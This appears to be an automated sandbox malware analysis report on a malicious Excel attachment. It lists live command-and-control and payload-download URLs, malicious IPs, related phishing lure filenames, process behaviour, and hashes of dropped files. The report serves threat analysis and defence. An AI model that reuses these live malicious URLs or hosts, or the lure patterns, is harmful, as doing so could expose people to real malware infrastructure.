            http://becharnise.ir/fa13/fre.php0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cutt.ly
            		172.67.8.238
            		truefalseunknown
            becharnise.ir
            		185.208.180.121
            		truetrueunknown
            stdyrusschinetwomast.dns.army
            		103.141.138.123
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://alphastand.win/alien/fre.phptrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://alphastand.trade/alien/fre.phptrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://stdyrusschinetwomast.dns.army/receiprt/regasm.exetrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://alphastand.top/alien/fre.phptrue
            • Avira URL Cloud: safe
            		unknown
            http://becharnise.ir/fa13/fre.phptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.%s.comPAvbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		low
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmpfalse
              		high
              http://www.day.com/dam/1.083553F27.emf.0.drfalse
                		high
                http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                172.67.8.238
                		unknownUnited States
                		13335CLOUDFLARENETUSfalse
                103.141.138.123
                		unknownViet Nam
                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                185.208.180.121
                		unknownIran (ISLAMIC Republic Of)
                		48147AMINIDCIRtrue

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:353332
                Start date:16.02.2021
                Start time:07:01:21
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 46s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:MV FORTUNE TRADER.xlsx
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 42.7% (good quality ratio 40.8%)
                • Quality average: 75.8%
                • Quality standard deviation: 29.4%
                HCA Information:Failed
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:02:10API Interceptor57x Sleep call for process: EQNEDT32.EXE modified
                07:02:16API Interceptor419x Sleep call for process: vbc.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                172.67.8.238Inquiry Bulgaria.xlsGet hashmaliciousBrowse
                • cutt.ly/AkBqUvK
                DHL-correction.xlsxGet hashmaliciousBrowse
                • cutt.ly/
                103.141.138.123E68-STD-239-2020-239.xlsxGet hashmaliciousBrowse
                • stdyrusschinetwomast.dns.army/receiprt/regasm.exe
                ETD 4.2 INOVOICE, PACKING LIST.xlsxGet hashmaliciousBrowse
                • stdyrusschine2mastab.dns.army/documenst/regasm.exe
                INQ 20-26626-0222.xlsxGet hashmaliciousBrowse
                • stdyrusschine2mastab.dns.army/documenst/regasm.exe
                BSL 21 PYT.xlsxGet hashmaliciousBrowse
                • sndyrusschine2masnbc.dns.army/documernt/regasm.exe
                VM ASIAN CHAMPION.xlsxGet hashmaliciousBrowse
                • russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
                VM ASIAN CHAMPION.xlsxGet hashmaliciousBrowse
                • russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
                VM ASIAN CHAMPION.xlsxGet hashmaliciousBrowse
                • stdyrusschine2mapafr.dns.army/russdoc/regasm.exe
                NEW ORDER.xlsxGet hashmaliciousBrowse
                • sndyrusschine2mapanx.dns.army/russdoc/regasm.exe
                Remittance Advice_usd9534.46.xlsxGet hashmaliciousBrowse
                • russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
                Remittance Advice_usd9534.46.xlsxGet hashmaliciousBrowse
                • russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
                INV_F3C-20CX-F3C05.xlsxGet hashmaliciousBrowse
                • tudyrusschine2mapanxmenischangednetuicm.ydns.eu/russdoc/regasm.exe
                MV JIN SHENG SHUI.xlsxGet hashmaliciousBrowse
                • russchine2stdymapanxmenischangednestvdq.ydns.eu/russdoc/regasm.exe
                TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                • thdyrusschine2mapanxmenischangednethnbc.ydns.eu/russdoc/regasm.exe
                185.208.180.1211BcHGhheBy.exeGet hashmaliciousBrowse
                • becharnise.ir/fa15/fre.php
                New Order.docGet hashmaliciousBrowse
                • becharnise.ir/fa15/fre.php
                PO. pdf.exeGet hashmaliciousBrowse
                • becharnise.ir/fa12/fre.php
                PI2rBmugqT.exeGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                P.I 467301.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                TMFZ3kZZ4L.exeGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                Funds Info.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                6vsSE5VaSM.exeGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                fBcCR6EOOW.exeGet hashmaliciousBrowse
                • becharnise.ir/fa16/fre.php
                RFQ 1002.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa1/fre.php
                TELEGRAPHIC TRANSFER.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exeGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exeGet hashmaliciousBrowse
                • becharnise.ir/fa18/fre.php
                scan00006.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa16/fre.php
                Payment Swift.xlsxGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                DHL INVOICE .exeGet hashmaliciousBrowse
                • becharnise.ir/fox/fre.php
                MFxGaBGmS2.exeGet hashmaliciousBrowse
                • becharnise.ir/tws/fre.php
                516Lnlw30O.exeGet hashmaliciousBrowse
                • becharnise.ir/fa11/fre.php
                L2WxaHfgd1.exeGet hashmaliciousBrowse
                • becharnise.ir/fa16/fre.php
                RFQ WBH00738_.xlsxGet hashmaliciousBrowse
                • becharnise.ir/tws/fre.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                cutt.lyPurchase Order.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                Inquiry Bulgaria.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                Inquiry Bulgaria.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                ProtectedAdviceSlip.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                notice of arrival.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                DHL_PRG201123213594.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                P.I 467301.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                Eur Swift copy.xlsxGet hashmaliciousBrowse
                • 104.22.0.232
                RFQ 2027376.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                PL + CI.xlsxGet hashmaliciousBrowse
                • 104.22.0.232
                Funds Info.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                Gresik Port Enquiry.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                aaHyijkXFm.docxGet hashmaliciousBrowse
                • 172.67.8.238
                aaHyijkXFm.docxGet hashmaliciousBrowse
                • 104.22.0.232
                Inquiry from Pure fine food Ltd.xlsxGet hashmaliciousBrowse
                • 104.22.0.232
                RFQ 1002.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                COVER LETTER SWFT200022823419.xlsxGet hashmaliciousBrowse
                • 104.22.1.232
                GRAND DEMETER_INV210211_00.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                Invoice 3110201031.xlsxGet hashmaliciousBrowse
                • 104.22.0.232
                becharnise.ir1BcHGhheBy.exeGet hashmaliciousBrowse
                • 185.208.180.121
                New Order.docGet hashmaliciousBrowse
                • 185.208.180.121
                PO. pdf.exeGet hashmaliciousBrowse
                • 185.208.180.121
                PI2rBmugqT.exeGet hashmaliciousBrowse
                • 185.208.180.121
                P.I 467301.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                TMFZ3kZZ4L.exeGet hashmaliciousBrowse
                • 185.208.180.121
                Funds Info.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                6vsSE5VaSM.exeGet hashmaliciousBrowse
                • 185.208.180.121
                fBcCR6EOOW.exeGet hashmaliciousBrowse
                • 185.208.180.121
                RFQ 1002.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                TELEGRAPHIC TRANSFER.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exeGet hashmaliciousBrowse
                • 185.208.180.121
                SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exeGet hashmaliciousBrowse
                • 185.208.180.121
                scan00006.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                Payment Swift.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                DHL INVOICE .exeGet hashmaliciousBrowse
                • 185.208.180.121
                MFxGaBGmS2.exeGet hashmaliciousBrowse
                • 185.208.180.121
                516Lnlw30O.exeGet hashmaliciousBrowse
                • 185.208.180.121
                L2WxaHfgd1.exeGet hashmaliciousBrowse
                • 185.208.180.121
                RFQ WBH00738_.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                stdyrusschinetwomast.dns.armyE68-STD-239-2020-239.xlsxGet hashmaliciousBrowse
                • 103.141.138.123

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                AMINIDCIR1BcHGhheBy.exeGet hashmaliciousBrowse
                • 185.208.180.121
                New Order.docGet hashmaliciousBrowse
                • 185.208.180.121
                PO. pdf.exeGet hashmaliciousBrowse
                • 185.208.180.121
                PI2rBmugqT.exeGet hashmaliciousBrowse
                • 185.208.180.121
                P.I 467301.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                TMFZ3kZZ4L.exeGet hashmaliciousBrowse
                • 185.208.180.121
                Funds Info.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                6vsSE5VaSM.exeGet hashmaliciousBrowse
                • 185.208.180.121
                fBcCR6EOOW.exeGet hashmaliciousBrowse
                • 185.208.180.121
                RFQ 1002.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                TELEGRAPHIC TRANSFER.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exeGet hashmaliciousBrowse
                • 185.208.180.121
                SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exeGet hashmaliciousBrowse
                • 185.208.180.121
                scan00006.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                Payment Swift.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                DHL INVOICE .exeGet hashmaliciousBrowse
                • 185.208.180.121
                MFxGaBGmS2.exeGet hashmaliciousBrowse
                • 185.208.180.121
                516Lnlw30O.exeGet hashmaliciousBrowse
                • 185.208.180.121
                L2WxaHfgd1.exeGet hashmaliciousBrowse
                • 185.208.180.121
                RFQ WBH00738_.xlsxGet hashmaliciousBrowse
                • 185.208.180.121
                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNQuotation(6656).exeGet hashmaliciousBrowse
                • 103.89.88.238
                Quotation-15-02-2021_PDF.exeGet hashmaliciousBrowse
                • 103.114.106.35
                swift copy.exeGet hashmaliciousBrowse
                • 103.89.88.238
                gyhHPdvJt1.exeGet hashmaliciousBrowse
                • 103.151.123.132
                P.I 467301.xlsxGet hashmaliciousBrowse
                • 103.99.1.173
                Remittance copy.xlsxGet hashmaliciousBrowse
                • 103.99.1.145
                Eur Swift copy.xlsxGet hashmaliciousBrowse
                • 103.99.1.158
                RFQ 2027376.xlsxGet hashmaliciousBrowse
                • 103.141.138.128
                Quotation_11-02-2021_WSBDJ.exeGet hashmaliciousBrowse
                • 103.114.106.35
                PL + CI.xlsxGet hashmaliciousBrowse
                • 103.141.138.125
                Funds Info.xlsxGet hashmaliciousBrowse
                • 103.99.1.173
                Scan_ 11 Feb 2021 at 1.25_Bz5543_PDF.exeGet hashmaliciousBrowse
                • 103.114.107.184
                Signed PO202002FiveBro2A2.exeGet hashmaliciousBrowse
                • 103.151.123.132
                Gresik Port Enquiry.xlsxGet hashmaliciousBrowse
                • 180.214.238.131
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 103.151.123.132
                Scan_ 10 Feb 2021 at 1.45_Bz5543_PDF.exeGet hashmaliciousBrowse
                • 103.114.107.184
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 103.151.123.132
                Inquiry from Pure fine food Ltd.xlsxGet hashmaliciousBrowse
                • 103.141.138.118
                RFQ 1002.xlsxGet hashmaliciousBrowse
                • 103.141.138.125
                MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                • 103.140.251.164
                CLOUDFLARENETUStS9P6wPz9x.exeGet hashmaliciousBrowse
                • 104.21.78.13
                SecuriteInfo.com.Generic.mg.44669e0ff064dfc9.dllGet hashmaliciousBrowse
                • 104.20.185.68
                SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dllGet hashmaliciousBrowse
                • 104.20.185.68
                SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllGet hashmaliciousBrowse
                • 104.20.184.68
                SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                • 104.20.184.68
                B62672021 PRETORIA.docGet hashmaliciousBrowse
                • 104.21.45.223
                NJPcHPuRcG.dllGet hashmaliciousBrowse
                • 104.20.184.68
                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                • 104.20.184.68
                13xakh1PtD.dllGet hashmaliciousBrowse
                • 104.20.184.68
                RFQ.xlsGet hashmaliciousBrowse
                • 104.20.139.65
                DUcKsYsyX0.dllGet hashmaliciousBrowse
                • 104.20.184.68
                RI51uAIUyL.dllGet hashmaliciousBrowse
                • 104.20.184.68
                IVJq3tVi96.exeGet hashmaliciousBrowse
                • 104.21.19.200
                Doc0538-2-21.xlsGet hashmaliciousBrowse
                • 104.20.138.65
                COTIZACI#U00d3N.exeGet hashmaliciousBrowse
                • 104.21.19.200
                REQUEST FOR QOUTATION.exeGet hashmaliciousBrowse
                • 104.21.19.200
                DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                • 162.159.133.233
                Shipping Documents Original BL, Invoice & Packing List.exeGet hashmaliciousBrowse
                • 172.67.188.154
                aS94x3Qp1s.exeGet hashmaliciousBrowse
                • 104.21.19.200
                Purchase Order.xlsxGet hashmaliciousBrowse
                • 172.67.8.238

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                7dcce5b76c8b17472d024758970a406bsignificant (92).xlsGet hashmaliciousBrowse
                • 172.67.8.238
                necessary (47).xlsGet hashmaliciousBrowse
                • 172.67.8.238
                Purchase Order.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                cotizacin.docGet hashmaliciousBrowse
                • 172.67.8.238
                Revised Order 193-002.docGet hashmaliciousBrowse
                • 172.67.8.238
                DOCUMENT (63).xlsGet hashmaliciousBrowse
                • 172.67.8.238
                estimated (99).xlsGet hashmaliciousBrowse
                • 172.67.8.238
                documents (29).xlsGet hashmaliciousBrowse
                • 172.67.8.238
                DkELZjJtGY.xlsmGet hashmaliciousBrowse
                • 172.67.8.238
                DHL - SL720073066537TX(3).docxGet hashmaliciousBrowse
                • 172.67.8.238
                notice of arrival.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                DHL_PRG201123213594.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                selfassessment.docmGet hashmaliciousBrowse
                • 172.67.8.238
                selfassessment.docmGet hashmaliciousBrowse
                • 172.67.8.238
                P.I 467301.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                Remittance copy.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                Eur Swift copy.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                RFQ 2027376.xlsxGet hashmaliciousBrowse
                • 172.67.8.238
                TKL Steel Quotation.docGet hashmaliciousBrowse
                • 172.67.8.238
                SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.docGet hashmaliciousBrowse
                • 172.67.8.238

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.0737496840385012
                Encrypted:false
                SSDEEP:6:kKDQZbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:LQA3kPlE99SNxAhUeo+aKt
                MD5:B54E87F83B8F07BB438A682306059DDA
                SHA1:4AE56DB76D87A5FD04D403F3EC6064475D1BB1D7
                SHA-256:81FBD3AF5D94928932AA195BEF6DD9A4E0AD98669B8FA52701FCE2114E1DCD34
                SHA-512:7F9F34C6BE796D7120D09E5FC73793693C6E1982830E8C6DA1969D136EBC4AC07C8C1DD389E67F2218EF9550310123E0F3E7EE629652059582E2E12B31E0CAEE
                Malicious:false
                Reputation:low
                Preview: p...... ..........A.u...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):269312
                Entropy (8bit):6.728521643538962
                Encrypted:false
                SSDEEP:6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
                MD5:2559B5B8D60DD663DF52D0570F5973A9
                SHA1:2AF0E521C34CF7EAAE8677E593900024FE0D16C9
                SHA-256:77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
                SHA-512:EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 36%
                Reputation:low
                IE Cache URL:http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E4EC363.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):653280
                Entropy (8bit):2.898644879031968
                Encrypted:false
                SSDEEP:3072:+34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:Q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                MD5:84AAA60F0AF5E0EDDB2933443E1474CB
                SHA1:C7D60583C47D7751E5F8A979FCA6810B9773D0C1
                SHA-256:A29F496C4454E7504D57570F001E2104EFB668C350B5F86D9FE781FE071F3754
                SHA-512:3683B8E5412FE101E97153A37EB51E5B2F82D1EBEE2D39236EF369AA06F028F6B49DF0AB198017E73B41626F62E9D6F86E3A0D16B1D838DD316DB7747BA736B0
                Malicious:false
                Reputation:low
                Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................8................N.].....................N.]........ ....ylR........ ............zlR............................................X...%...7...................{ .@................C.a.l.i.b.r.............(...X............2eR.................{cR....,.......dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87860A6A.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):111378
                Entropy (8bit):7.963743447431302
                Encrypted:false
                SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                MD5:5ACDB72AF63832D23CED937B6B976471
                SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A79A1ACD.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
